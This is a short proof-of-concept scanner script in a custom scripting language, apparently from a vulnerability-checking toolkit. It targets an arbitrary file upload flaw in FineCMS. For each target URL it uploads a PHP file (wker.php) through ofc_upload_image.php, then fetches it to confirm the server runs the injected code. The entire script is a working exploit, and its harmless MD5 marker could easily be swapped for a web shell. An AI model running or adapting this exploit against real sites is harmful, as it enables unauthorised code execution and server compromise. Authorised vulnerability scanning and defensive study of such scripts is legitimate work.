#request urls = array
#define payload =/dayrui/libraries/Chart/ofc_upload_image.php?name=wker.php
#define bug = 81dc9bdb52d04dc20036dbd8313ed055
#define info = 存在FineCMS任意文件上传漏洞
#define PostData = <?print(md5(1234));?>
function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			HttpPost(url.payload,PostData,"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			res = HttpGet(url."/dayrui/libraries/tmp-upload-images/wker.php","User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
